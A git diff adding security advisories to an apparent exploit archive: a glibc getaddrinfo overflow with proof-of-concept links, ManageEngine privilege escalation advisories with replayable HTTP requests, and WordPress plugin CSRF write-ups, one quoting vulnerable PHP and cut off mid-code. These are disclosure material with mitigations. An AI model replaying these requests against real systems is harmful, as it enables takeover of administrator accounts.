diff --git a/files.csv b/files.csv index e67aa04a7..13faba61a 100755 --- a/files.csv +++ b/files.csv @@ -34937,7 +34937,7 @@ id,file,description,date,author,platform,type,port 38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Stored XSS Vulnerability",2015-11-09,Nu11By73,hardware,webapps,0 39374,platforms/osx/dos/39374.c,"OS X Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - SEH Over-Write",2015-11-09,Un_N0n,windows,dos,0 -38660,platforms/php/remote/38660.rb,"Wordpress Ajax Load More PHP Upload Vulnerability",2015-11-09,metasploit,php,remote,0 +38660,platforms/php/remote/38660.rb,"Wordpress Ajax Load More 2.8.1.1 - PHP Upload Vulnerability",2015-11-09,metasploit,php,remote,0 38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - CSRF Vulnerability",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0 38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0 38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0 @@ -35688,3 +35688,9 @@ id,file,description,date,author,platform,type,port 39446,platforms/win32/local/39446.py,"Microsoft Windows - AFD.SYS Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win32,local,0 39447,platforms/windows/dos/39447.py,"Network Scanner Version 4.0.0.0 - SEH Crash POC",2016-02-15,INSECT.B,windows,dos,0 39448,platforms/php/webapps/39448.txt,"Tiny Tiny RSS - Blind SQL Injection",2016-02-15,"Kacper Szurek",php,webapps,80 +39449,platforms/multiple/webapps/39449.txt,"ManageEngine OPutils 8.0 - Multiple Vulnerabilities",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0 +39450,platforms/multiple/webapps/39450.txt,"ManageEngine Network Configuration Management Build 11000 - Privilege Escalation",2016-02-16,"Kaustubh G. Padwad",multiple,webapps,0 +39451,platforms/php/webapps/39451.txt,"WordPress ALO EasyMail Newsletter Plugin 2.6.01 - CSRF Vulnerability",2016-02-16,"Mohsen Lotfi",php,webapps,80 +39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0 +39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / CSRF",2016-02-16,hyp3rlinx,php,webapps,0 +39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0 diff --git a/platforms/linux/dos/39454.txt b/platforms/linux/dos/39454.txt new file mode 100755 index 000000000..16f45103c --- /dev/null +++ b/platforms/linux/dos/39454.txt @@ -0,0 +1,34 @@ +Sources: +https://googleonlinesecurity.blogspot.sg/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html +https://github.com/fjserna/CVE-2015-7547 + +Technical information: + +glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. + +Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated. + +Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow. + +The vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further. + +We are providing this code as-is. You are responsible for protecting yourself, +your property and data, and others from any risks caused by this code. This +code may cause unexpected and undesirable behavior to occur on your machine. +This code may not detect the vulnerability on your system. + +Note that this POC consists of two components: server code and client code. +The server code triggers the vulnerability and therefore will crash the client +code. Note also that it is necessary to set the nameserver to point to the +server code, and doing so could cause other programs that call into the +getaddrinfo() function to crash while testing is underway. This POC code is +provided "as is" with no warranties, whether express or implied, including +without limitation any warranties or merchantability, fitness for a particular +use and noninfringement. Google assumes no responsibility for your proper +installation and use of the POC code. + + +Proof of Concept: +https://github.com/fjserna/CVE-2015-7547/archive/master.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39454-1.zip + diff --git a/platforms/multiple/webapps/39449.txt b/platforms/multiple/webapps/39449.txt new file mode 100755 index 000000000..4ac41d6b5 --- /dev/null +++ b/platforms/multiple/webapps/39449.txt @@ -0,0 +1,308 @@ +=================================================================================== +Privilege escalation Vulnerability in ManageEngine oputils +=================================================================================== + +Overview +======== + +Title:- Privilege escalation Vulnerability in ManageEngine oputils +Author: Kaustubh G. Padwad +Vendor: ZOHO Corp +Product: ManageEngine oputils +Tested Version: : oputils 8.0 +Severity: HIGH + +Advisory ID +============ +2016-05-Manage_Engine + +About the Product: +================== +OpUtils is a Switch Port & IP Address Management software that helps network engineers manage their Switches and IP Address Space with ease. With its comprehensive set of 30+ tools, it helps them to perform network monitoring tasks like detecting a rogue device intrusion, keep a check on bandwidth usage, monitoring availability of critical devices, backing up Cisco configuration files and more. + +Description: +============ + +This Privilege escalation vulnerability enables an Normal user to escalate privilege and become administrator of the application. + +Vulnerability Class: +==================== +Top 10 2014-I2 Insufficient Authentication/Authorization https://www.owasp.org/index.php/Top_10_2014-I2_Insufficient_Authentication/Authorization + +How to Reproduce: (POC): +======================== + +* you should have Read only user on OpUtils + +* login with that account to get api key something like 375e0fa0-0bb3-479c-a646-debb90a1f5f0 + +* Setup Burp and use change user password request and change userName to admin and newPwd to desire password HUrry you are admin now. :) + +POC +==== + +Burp Requst +----------- +POST /oputilsapi/admin?key=375e0fa0-0bb3-479c-a646-debb90a1f5f0 HTTP/1.1 + +Host: 192.168.1.10:7080 + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 + +Accept: application/json, text/javascript, */*; q=0.01 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +X-Requested-With: XMLHttpRequest + +Referer: http://192.168.1.10:7080/apiclient/ember/index.jsp + +Content-Length: 151 + +Cookie: OPUTILSJSESSIONID=AC6E9B2C01FDDD5E27C245BC6F31C032; JSESSIONID=B59D8FD4B17DB7200A991299F4034DF1; OPUTILSJSESSIONIDSSO=1F8857A875EB16418DD7889DB60CFB66 + +Connection: keep-alive + +Pragma: no-cache + +Cache-Control: no-cache + + + +v=1&format=json&operation=DELETE_OR_MODIFY_USER&action1=MODIFY_USER&userInAction=kk&userRole=Administrator&userAuthType=Local&contactinfoID=2&loginID=2 + + +Response +-------- +HTTP/1.1 200 OK + +Server: Apache-Coyote/1.1 + +Set-Cookie: OPUTILSJSESSIONIDSSO=1F8857A875EB16418DD7889DB60CFB66; Expires=Thu, 01-Jan-1970 00:00:10 GMT + +Set-Cookie: OPUTILSJSESSIONID=184C572A3D2E17EEC3B78C027B925421; Path=/ + +Content-Type: application/json;charset=UTF-8 + +Content-Length: 90 + +Date: Thu, 04 Feb 2016 13:27:09 GMT + + + +{"input":"{newUserName=MODIFY_USER, userInAction=kk, domainName=null}","status":"Success"} + + +Mitigation +========== +Upgrade to next Service pack + +Disclosure: +=========== +04-Feb-2016 Repoerted to vendor +11-Feb-2016 Fixed By vendor + +################################################################################ + +==================================================================================================== +Missing Function Level Access control Vulnerability in OPutils +==================================================================================================== + +Overview +======== + +Title:- Missing Function Level Access control Vulnerability in ManageEngine OpUtils +Author: Kaustubh G. Padwad +Vendor: ZOHO Corp +Product: OPUTILS +Tested Version: : OPUTILS 8.0 +Severity: Medium + +Advisory ID +============ +2016-06-Manage_Engine + +Description: +============ + +This Missing Function Level Access Control vulnerability enables an Normal user to execute the Adinisitative Task. + +Vulnerability Class: +==================== +2013-A7-Missing Function Level Access Control https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control + +How to Reproduce: (POC): +======================== + +* Get The administrative Task URL from either demo site or download locally + +* Now Login With Normal User + +* Paste the below requst or any other for Ex. http://IP-OF-Server:7080/oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS + +POC +==== + +Burp Requst +----------- +GET /oputilsapi/admin?v=1&format=json&key=375e0fa0-0bb3-479c-a646-debb90a1f5f0&operation=GET_USER_DETAILS HTTP/1.1 + +Host: 192.168.1.10:7080 + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 + +Accept: */* + +Accept-Language: en-US,en;q=0.5 + + + +Response +-------- + + +HTTP/1.1 200 OK +erver: Apache-Coyote/1.1 + +Content-Type: application/json;charset=UTF-8 + +Content-Length: 589 + +Date: Thu, 04 Feb 2016 14:28:25 GMT + + + +{"result":[{"ad-domain-name":"","user-name":"admin","account-created-time":"30 Jan 16, 12:20 AM","Action":"","user-contactinfo-id":"1","user-role":"Administrator","user-description":"--","user-phone-number":"","user-email":"","user-id":"1","ad-domain-id":"","user-login-id":"1"},{"ad-domain-name":"","user-name":"kk","account-created-time":"30 Jan 16, 12:23 AM","Action":"","user-contactinfo-id":"2","user-role":"Read Only User","user-description":"--","user-phone-number":"","user-email":"","user-id":"2","ad-domain-id":"","user-login-id":"2"}],"input":"{userId=null}","status":"Success"} +Server: Apache-Coyote/1.1 + +Access-Control-Allow-Origin: * + +Access-Control-Allow-Methods: GET,POST + +Access-Control-Max-Age: 5000 + +Content-Type: application/json;charset=UTF-8 + +Date: Sat, 30 Jan 2016 21:39:03 GMT + +Content-Length: 19 + + + +{"resolved":true} + +Accept-Encoding: gzip, deflate + +X-Requested-With: XMLHttpRequest + +Referer: http://192.168.1.10:7080/apiclient/ember/index.jsp + +Cookie: OPUTILSJSESSIONID=C256E5B41CC23B33ACF94D206E243FB2; JSESSIONID=B59D8FD4B17DB7200A991299F4034DF1; OPUTILSJSESSIONIDSSO=28A377BA0B7D0C6E21D1E2B3A3E4A371 + +Connection: keep-alive + +Mitigation +========== +Upgrade to NextService Pack + +Disclosure: +=========== +04-Feb-2016 Repoerted to vendor +11-Feb-2016 Fixed By Vendor + +################################################################################ + +=============================================================================== +CSRF and XXS In Manage Engine oputils +=============================================================================== + +Overview +======== + +* Title : CSRF and XSS In Manage Engine OPutils +* Author: Kaustubh G. Padwad +* Plugin Homepage: https://www.manageengine.com/products/oputils/ +* Severity: HIGH +* Version Affected: Version 8.0 +* Version Tested : Version 8.0 +* version patched: + +Advisory ID +============ +2016-01-Manage_Engine + +Description +=========== + +Vulnerable Parameter +-------------------- +1. RouterName +2. action Form +3. selectedSwitchTab +4. ipOrHost +5. alertMsg +6. hostName +7. switchID +8. oidString + +About Vulnerability +------------------- +This Application is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin?s browser can be made t do almost anything the admin user could typically do by hijacking admin's cookies etc. + +Vulnerability Class +=================== +Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) +Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) + +Steps to Reproduce: (POC) +========================= + +* Add follwing code to webserver and send that malicious link to application Admin. +* The admin should be loggedin when he clicks on the link. +* Soical enginering might help here + +For Example :- Device password has been changed click here to reset + +####################CSRF COde####################### + + +
+ + + + + + + + +Mitigation +========== +Upgrade to next service pack + +Change Log +========== + +Disclosure +========== +28-January-2016 Reported to Developer +28-January-2016 Acknodlagement from developer +11-February-2016 Fixed by vendor () + +credits +======= +* Kaustubh Padwad +* Information Security Researcher +* kingkaustubh@me.com +* https://twitter.com/s3curityb3ast +* http://breakthesec.com +* https://www.linkedin.com/in/kaustubhpadwad diff --git a/platforms/multiple/webapps/39450.txt b/platforms/multiple/webapps/39450.txt new file mode 100755 index 000000000..bca9eaa17 --- /dev/null +++ b/platforms/multiple/webapps/39450.txt @@ -0,0 +1,128 @@ +=================================================================================== +Privilege escalation Vulnerability in ManageEngine Network Configuration Management +=================================================================================== + +Overview +======== + +Title:- Privilege escalation Vulnerability in ManageEngine Network Configuration Management +Author: Kaustubh G. Padwad +Vendor: ZOHO Corp +Product: ManageEngine Network Configuration Manager +Tested Version: : Network Configuration Manager Build 11000 +Severity: HIGH + +Advisory ID +============ +2016-03-Manage_Engine + +About the Product: +================== + +Network Configuration Manager is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, Network Configuration Manager helps automate and take total control of the entire life cycle of device configuration management. + +Description: +============ + +This Privilege escalation vulnerability enables an Normal user to escalate privilege and become administrator of the application. + +Vulnerability Class: +==================== +Top 10 2014-I2 Insufficient Authentication/Authorization https://www.owasp.org/index.php/Top_10_2014-I2_Insufficient_Authentication/Authorization + + +How to Reproduce: (POC): +======================== + +* you should have Operator Account on Network Configuration Management + +* login with that account to get api key something like user_1453993872278 + +* Setup Burp and use change user password request and change userName to admin and newPwd to desire password HUrry you are admin now. :) + +POC +==== + +Burp Requst +----------- +POST /nfaapi/json/admin/changePassword HTTP/1.1 + +Host: 192.168.1.10:8080 + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 + +Accept: */* + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +X-Requested-With: XMLHttpRequest + +Referer: http://192.168.1.10:8080/netflow/ncmapiclient/ember/index.jsp + +Content-Length: 50 + +Cookie: OPUTILSJSESSIONID=E062B23129AA1269EF13794C7710DF8E; JSESSIONID=FBA6ADEE16123786896DF765CA4C9E87; NFA_Jsession=0BF63F9CE8F4DCF664857F92403D8B44; iamcsrfcookie=fbcc4bcb-34ea-4cc8-8cb3-e95dbfc0603d; NFA__SSO=0ED579E64493B973F5BCA1C94EAD6310 + +Connection: keep-alive + +Pragma: no-cache + +Cache-Control: no-cache + + + +userName=admin&newPwd=11&apiKey=king_1453993872278 + + +Response +-------- +HTTP/1.1 200 OK + +Server: Apache-Coyote/1.1 + +Access-Control-Allow-Origin: * + +Access-Control-Allow-Methods: GET,POST + +Access-Control-Max-Age: 5000 + +Content-Type: application/json;charset=UTF-8 + +Date: Sat, 30 Jan 2016 20:22:15 GMT + +Content-Length: 23 + + + +{"message":"success"} + + + +Mitigation +========== + +* Please Stop Network configuration manager service. +* Open Ncm\lib and cut AdvNCM.jar and paste it in to Desktop. +* Download the AdvNCM.jar file from below link and paste it under Ncm\lib +* https://uploads.zohocorp.com/Internal_Useruploads/dnd/DeviceExpert/o_1ab396o1i1a6v8j1cr86uet581/AdvNCM.jar +* Open Ncm\logs and delete all the files inside it, +* Start the Ncm service and check the issue. + +Disclosure: +=========== +* 31-JAN-2016 Repoerted to vendor +* 31-Feb-2016 Ack by Vendor +* 09-Feb-2016 Fixed By Vendor + +credits: +======== +* Kaustubh Padwad +* Information Security Researcher +* kingkaustubh@me.com +* https://twitter.com/s3curityb3ast +* http://breakthesec.com +* https://www.linkedin.com/in/kaustubhpadwad diff --git a/platforms/php/webapps/39451.txt b/platforms/php/webapps/39451.txt new file mode 100755 index 000000000..c377cc729 --- /dev/null +++ b/platforms/php/webapps/39451.txt @@ -0,0 +1,85 @@ +# Exploit Title: Wordpress ALO EasyMail Newsletter plugin cross-site request forgery vulnerability +# Software Link: https://wordpress.org/plugins/alo-easymail/ +# Affected Version: 2.6.01 +# Exploit Author: Mohsen Lotfi +# Contact: mohsen.lotfi.all@gmail.com +# Twitter: fox_one_fox_one +# Date: 01-16-2016 + +##################### +1. Description +##################### + +The plugin contains a CSRF vulnerability, which can be exploited to perform a script insertion attack. + +script insertion happens in wp-content/plugins/alo-easymail/pages/alo-easymail-admin-options.php : + + case "save_list": // SAVE a mailing list (add or update) + if ( isset($_REQUEST['submit_list']) ) { + //$list_name = stripslashes( trim( $_POST['elp_list_name'] ) ); + + // List name + $list_name = array(); + foreach ( $languages as $key => $lang ) { + if (isset($_POST['listname_'.$lang]) ) $list_name[$lang] = stripslashes(trim($_POST['listname_'.$lang])); /* script insertion here */ + } + + $list_available = stripslashes( trim( $_POST['elp_list_available'] ) ); + $list_order = stripslashes( trim( $_POST['elp_list_order'] ) ); + if ( $list_name && $list_available && is_numeric($list_order) ) { + $mailinglists = alo_em_get_mailinglists ( 'hidden,admin,public' ); + if ( $list_id ) { // update + $mailinglists [$list_id] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order ); + } else { // or add a new + if ( empty($mailinglists) ) { // if 1st list, skip index 0 + $mailinglists [] = array ( "name" => "not-used", "available" => "deleted", "order" => ""); + } + $mailinglists [] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order); + } + if ( alo_em_save_mailinglists ( $mailinglists ) ) { + unset ( $list_id ); + unset ( $list_name ); + unset ( $list_available ); + unset ( $list_order ); + echo ''. __("Updated", "alo-easymail") .'
'. __("Error during operation.", "alo-easymail") .'
'. __("Inputs are incompled or wrong. Please check and try again.", "alo-easymail") .'